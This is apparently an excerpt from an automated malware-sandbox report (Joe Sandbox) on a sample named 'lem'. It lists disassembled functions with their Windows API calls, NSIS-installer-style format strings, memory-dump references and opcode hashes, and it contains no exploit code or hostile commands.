                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                    Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                    • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                    Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                    Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                    Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: Version
                                                                                                                                                                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
